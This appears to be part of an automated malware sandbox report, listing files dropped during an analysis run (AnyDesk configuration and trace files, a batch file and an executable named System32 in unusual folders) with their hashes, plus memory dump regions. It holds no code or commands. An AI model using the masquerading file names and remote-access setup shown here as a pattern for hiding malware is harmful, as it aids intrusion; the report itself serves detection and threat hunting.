2035cedea5d86a7b5c020abc8763aed9fd1b0d49

SHA256
d052164be8748395b746583220e6e65a13548243a5436feb0d74f843f32083d1

SHA512
f19e9f808834a6a7111fb7b2c0785b3050d931dc706fa1f314bcb213d7cab938514fee4032dad3a8f28bda65209daf4505025e77ba0d91feb3d82bcd87276cbc

Download Submit
C:\ProgramData\AnyDesk\system.conf
Filesize
747B

MD5
e7738117c5524f22fa99cd7f2a5ad382

SHA1
14f50aec8cbcaa70e70479f1cf3897d90e24b0d1

SHA256
6d8e70d9aa419d6e014340d47e0d9abf45d02febe3d957af939875a5ba92b5f6

SHA512
4a3326296462271744128cc3b7bca1b9734da8566dabed2d01757da71a97af4efd9677bed88f74917d64501177c5811af335ce0ad3363360eccb04e25c31d766

Download Submit
C:\ProgramData\AnyDesk\system.conf
Filesize
956B

MD5
6319ce0b5326caf23489e5adddcee4a0

SHA1
d7769680610321abaf0c763351c6c9d34127a664

SHA256
4096756b9b370649a03c4b9fa1efbc6f8728ba38ca314b12badf34fa1a01f181

SHA512
870be307398d3cbc8209fdbfa32be138d83bb2b54e056948c0085b6fc3a7d016a81b501e92be9ce8a9ec262aa0a428995a130751d28061d92a632955a9c86901

Download Submit
C:\ProgramData\System32.bat
Filesize
1KB

MD5
73e1f5a29694c5899071a654e501e174

SHA1
bef7e160242c776d04bc4e6766fd22a848e10142

SHA256
53ed7e7fa874e9965210b8c600ab9c0f331c7f1d514bb2cfe13375edcf0a8f74

SHA512
e16dc641315d7f04b05844432438b19f5f00aaefde5da54f24f37e9b158df90fa54e0a5b9ea749c5e239528f6d55e3bd22374ffd91acb2a2e03b0fd784fa71ff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\System32.exe.log
Filesize
654B

MD5
2cbbb74b7da1f720b48ed31085cbd5b8

SHA1
79caa9a3ea8abe1b9c4326c3633da64a5f724964

SHA256
e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3

SHA512
ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
1a9fa92a4f2e2ec9e244d43a6a4f8fb9

SHA1
9910190edfaccece1dfcc1d92e357772f5dae8f7

SHA256
0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

SHA512
5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
1bb532b5a4c3719a8f8905bcdd4b46dd

SHA1
5b8172fb3038f4e0dbd81995d48bc446ec70e26d

SHA256
7b77cd3f6634833b49bb35b7564e8193e1d5b00e0467a431797d4ee15d38e795

SHA512
27393736905758e7140bf664bb256ff8e9bb209bcabf984030a4dc8697cb6bc4388b67c3fbf579c7e2ac57513122a4cbd30cba4928762450d081f8664c019c52

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
40528f21e62ac55b45b89c31cef94b34

SHA1
6d6f5d19397f9fbeb71c661261066268b8a0111b

SHA256
f312cec5d5a9e227285d82a09e4002c827b58b18b7aa4c9477485cc4ce479dbc

SHA512
679b8be2049b9e3642295f9b39f66544ecd02d03160d86cf40b8290e4723187a9f108e71bd005d6eaeebe724d251e4828b152f33df870687d30d23b6877fd33a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
21017c68eaf9461301de459f4f07e888

SHA1
41ff30fc8446508d4c3407c79e798cf6eaa5bb73

SHA256
03b321e48ff3328d9c230308914961fe110c4c7bc96c0a85a296745437bcb888

SHA512
956990c11c6c1baa3665ef7ef23ef6073e0a7fcff77a93b5e605a83ff1e60b916d80d45dafb06977aed90868a273569a865cf2c623e295b5157bfff0fb2be35d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
d8f32fd3fbbbb87ea88ed7b823adc7eb

SHA1
7992e16e92f146bddc925b6c0decbcc23b6f17bd

SHA256
655e240fcfd9da5958966e13cb5dbaa2541baf937bb08fc0799899ff8f5d47dc

SHA512
1722912ff5f39260bd835ac7d9203dc0306218ddd1b6026ecd839aceb772bdd8e1a961e740a95cd4aa776ff4ade4585067f48240a858c4460e343320b07e9364

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
051a74485331f9d9f5014e58ec71566c

SHA1
4ed0256a84f2e95609a0b4d5c249bca624db8fe4

SHA256
3f67e4ba795fd89d33e9a1fe7547e297a82ae50b8f25eedc2b33a27866b28888

SHA512
1f15fd8ca727b198495ef826002c1cbcc63e98eecb2e92abff48354ae668e6c3aaf9bd3005664967ae75637bacee7e730ce36142483d08ae6a068d9ae3e0e17d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gtdh25u4.hfk.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace
Filesize
28KB

MD5
2602eb05dd419b7f8a1fcac13c5d6ac2

SHA1
156853e5c482fbdae973858429797aa993ee7220

SHA256
818bf9e627b6f7e79efb1600166a4abcc0752338f540b580e57cd0c46c5a78a2

SHA512
57cb235276eddc22a9dd22d5050f0938602d8bbc5e7f2af7d55f489d3ffc3a42779c8698fc1a55e3b981805183e79db3c1fc46b686f266043473fa82b6f6ba84

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace
Filesize
32KB

MD5
524d62d99f1439139774e013417fedeb

SHA1
3843cafa4ed8c7f883048ff4436c6923107ccdb0

SHA256
35f893aa1c933d61f09502cd2f6cf449cc3d54a45a53cab7f21c1741720d74b5

SHA512
0ba350e9cdde8033050e894c058b2733c4a47dfa8259e5e0abb5e190818fd85e2b655408f016232f1170a253e7eece10dc77de06d3d8ace41da4fc4149e7b0d3

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace
Filesize
38KB

MD5
845213cee4ad06db3363e2893ace3d88

SHA1
6583940eb951e070bfd51927ace369b08dfcc4c4

SHA256
2c3809eaeec78bfa7f364882b1d1013ba16baa75c3e955dfe36daaa370a0233a

SHA512
13109adc897a2d905b3cccc5144348c8fb256cefa97afdc2320519eeee6a86d46680d218433c7a2d29c3818c0cdd3e499e550f4d9dac97e09355d5fa0ee4e3ca

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.trace
Filesize
8KB

MD5
fdd4b4ef5baabfd2d6ad6efb6165802a

SHA1
ccab8b13616f82e11b8796bf675bc7450ba071dc

SHA256
8de59f3fd660ec549fc727cacc4028051706b9ba8fc7a2e867eaf0711e98a440

SHA512
f06702ee3ff985e90b5f7a90b19f170960b8cf9e0e9f8b14eeb26ae9a7d665012da24ca2202389cb980719297eb3513e23573d3e090adcfffbc690c0c65b9c96

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\service.conf
Filesize
2KB

MD5
a1febfd0d7250ff544e9571a2455797c

SHA1
8e48d6c88aa4b86f57c52f27f3a3f31ec8168a2d

SHA256
922235df26ba159df9337f9126a83566c3426459759b2e9a36038d4708c9fd5b

SHA512
e20dfc595e21256b6600f414e9bfa0a79efa030b04b8169a3bc3b342727b6c726fb499acb8cc42bf9777faa6a47aae2044f88764c8039913e825586be603adc3

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf
Filesize
424B

MD5
8d320d56839fd5b0cc0d4743f69e5c7a

SHA1
d21c6c350072d63270b06a780108b80d06500830

SHA256
7f24ff661cb9fd8efc824684daff043bf2eeebafe36a066eb4c8ff8c25faac07

SHA512
0b4f557c92fe43e1e61c7afae557054892ef08c7fa0bf6cb252dcb7b0bdc805008351d8bbf0cec55a7492ef37c9e4796501ff772d9e405541f1dc4c03a0f0ffd

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf
Filesize
632B

MD5
53431d0c8ae79ed5d32e619cd10ce1a6

SHA1
a25536ebc439995f5f35521322451f480ad54d72

SHA256
f8ec6b7120e75a5897c82fa849ad89fa2e48763e7e06aed77b6e8136d021dd59

SHA512
40edc010367548878d20189c0d630ff986c9e953fbb8fc75845303b3aec263f9f94d372ff708590fe180f2a8a7340734aa2d5f37f7d8277e1abb2212d56f34d1

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\system.conf
Filesize
312B

MD5
0c04ad1083dc5c7c45e3ee2cd344ae38

SHA1
f1cf190f8ca93000e56d49732e9e827e2554c46f

SHA256
6452273c017db7cbe0ffc5b109bbf3f8d3282fb91bfa3c5eabc4fb8f1fc98cb0

SHA512
6c414b39bbc1f1f08446c6c6da6f6e1ceb9303bbf183ae279c872d91641ea8d67ec5e5c4e0824da3837eca73ec29fe70e92b72c09458c8ce50fa6f08791d1492

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
Filesize
1KB

MD5
a1908800919718602641b8db4ea29f9b

SHA1
172d04fb65d1cc12b24187b435ad79cd028c1972

SHA256
48b737441db0bff16f8f6dcf4e60b690268d022af8c77d246d84dd740fef039b

SHA512
7c6f3b7bd80e7a61f996c996a3500f96c180115d8ab41393c081fc8253f1c93e5263a449ec500d34aa06d5e6e8d99b0f9b61019d6cea596868a1195b4c7de7f4

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
Filesize
5KB

MD5
e570d6c1d6b000d7ef8a6aef2301b312

SHA1
6385fbb1ed8ffd9afbb753228a7919a16563efbb

SHA256
90bc238cbce527c3a54e2ae92ab04c01b9cc0de244f8fa3dabab8eeb362845d5

SHA512
6594c5fc070a1c520a162512fea1efc45f6608c274ba92e9e1569664d575e8b52e0732c7ec2185af2c45638a49f803161ba54e9c3da5171250573c628248d899

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
Filesize
5KB

MD5
df7999c4d6fedd772d40eb50e6caebba

SHA1
e9b016fe140480ffa84535e87d12a19f360c8518

SHA256
eb0a49cdf446faf225290bf5dbc820a58cc734c77dcb012d1b934e3585720019

SHA512
66c76b68afd972fc7f1a865b2c985f58f7330a8ac86d8ba2043981120190c8753306c608618737d9878a92a8e994f080e284331d3df31da78ac728b9c8e26c04

Download Submit
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
Filesize
41B

MD5
a787c308bd30d6d844e711d7579be552

SHA1
473520be4ea56333d11a7a3ff339ddcadfe77791

SHA256
8a395011a6a877d3bdd53cc8688ef146160dab9d42140eb4a70716ad4293a440

SHA512
da4fcf3a3653ed02ee776cfa786f0e75b264131240a6a3e538c412e98c9af52c8f1e1179d68ed0dd44b13b261dc941319d182a16a4e4b03c087585b9a8286973

Download Submit
C:\Users\Admin\System32.exe
Filesize
121KB

MD5
5c76d15a7d3f57f26edc494bd9db318b

SHA1
cfa089d8d7e9fde67b6cb85827d33431b2d80066

SHA256
af872e954905dbfeb165da42d722889a7dfc4b84e88b52c9abc9de18a1a9d74f

SHA512
3d7a621dcb56a8d8ded08e49c34c77071bcb8e8f408acd2ec9c00ff887342d1e3be935f3ad56b33ef7a96d0d85e1e36b6cccc9498a2b0fe96dab7b5d5747c1fb

Download Submit
\??\PIPE\wkssvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/832-299-0x00000000007E0000-0x0000000001F29000-memory.dmp

Filesize
23.3MB

Download
memory/960-0-0x00007FFDD7243000-0x00007FFDD7245000-memory.dmp

Filesize
8KB

Download
memory/960-56-0x00007FFDD7240000-0x00007FFDD7D02000-memory.dmp

Filesize
10.8MB

Download
memory/960-1-0x0000000000CB0000-0x0000000000CD8000-memory.dmp

Filesize
160KB

Download
memory/960-55-0x000000001D580000-0x000000001DAA8000-memory.dmp

Filesize
5.2MB

Download
memory/960-53-0x00007FFDD7240000-0x00007FFDD7D02000-memory.dmp

Filesize
10.8MB

Download
memory/960-54-0x000000001CDA0000-0x000000001CE50000-memory.dmp

Filesize
704KB

Download
memory/1008-12-0x00007FFDD7240000-0x00007FFDD7D02000-memory.dmp

Filesize
10.8MB

Download
memory/1008-13-0x00007FFDD7240000-0x00007FFDD7D02000-memory.dmp

Filesize
10.8MB

Download
memory/1008-14-0x00007FFDD7240000-0x00007FFDD7D02000-memory.dmp

Filesize
10.8MB

Download
memory/1008-7-0x00000176DEA80000-0x00000176DEAA2000-memory.dmp

Filesize
136KB

Download
memory/1008-11-0x00007FFDD7240000-0x00007FFDD7D02000-memory.dmp

Filesize
10.8MB

Download
memory/1008-17-0x00007FFDD7240000-0x00007FFDD7D02000-memory.dmp

Filesize
10.8MB

Download
memory/1092-379-0x00000000007E0000-0x0000000001F29000-memory.dmp

Filesize
23.3MB

Download
memory/1092-320-0x00000000007E0000-0x0000000001F29000-memory.dmp

Filesize
23.3MB

Download
memory/1092-337-0x00000000007E0000-0x0000000001F29000-memory.dmp

Filesize
23.3MB

Download
memory/1332-284-0x00000000007E0000-0x0000000001F29000-memory.dmp

Filesize
23.3MB

Download
memory/1332-273-0x00000000007E0000-0x0000000001F29000-memory.dmp

Filesize
23.3MB

Download
memory/1912-84-0x00000000004E0000-0x0000000001C29000-memory.dmp

Filesize
23.3MB

Download
memory/1912-174-0x00000000004E0000-0x0000000001C29000-memory.dmp

Filesize
23.3MB

Download
memory/3376-173-0x00000000004E0000-0x0000000001C29000-memory.dmp

Filesize
23.3MB

Download
memory/3376-83-0x00000000004E0000-0x0000000001C29000-memory.dmp

Filesize
23.3MB

Download
memory/3384-345-0x00000000007E0000-0x0000000001F29000-memory.dmp

Filesize
23.3MB

Download
memory/3384-285-0x00000000007E0000-0x0000000001F29000-memory.dmp

Filesize
23.3MB

Download
memory/3384-335-0x00000000007E0000-0x0000000001F29000-memory.dmp

Filesize
23.3MB

Download
memory/3384-313-0x00000000007E0000-0x0000000001F29000-memory.dmp

Filesize
23.3MB

Download
memory/3384-181-0x00000000007E0000-0x0000000001F29000-memory.dmp

Filesize
23.3MB

Download
memory/3948-223-0x00000000004E0000-0x0000000001C29000-memory.dmp

Filesize
23.3MB

Download
memory/3948-75-0x00000000004E0000-0x0000000001C29000-memory.dmp

Filesize
23.3MB

Download
memory/4564-310-0x000001A2CB540000-0x000001A2CBCE6000-memory.dmp

Filesize
7.6MB

Download
memory/4564-309-0x000001A2CA160000-0x000001A2CA322000-memory.dmp

Filesize
1.8MB

Download
memory/4920-336-0x00000000007E0000-0x0000000001F29000-memory.dmp

Filesize
23.3MB

Download
memory/4920-227-0x00000000007E0000-0x0000000001F29000-memory.dmp

Filesize
23.3MB

Download
memory/4920-286-0x00000000007E0000-0x0000000001F29000-memory.dmp

Filesize
23.3MB

Download
memory/4920-380-0x00000000007E0000-0x0000000001F29000-memory.dmp

Filesize
23.3MB

Download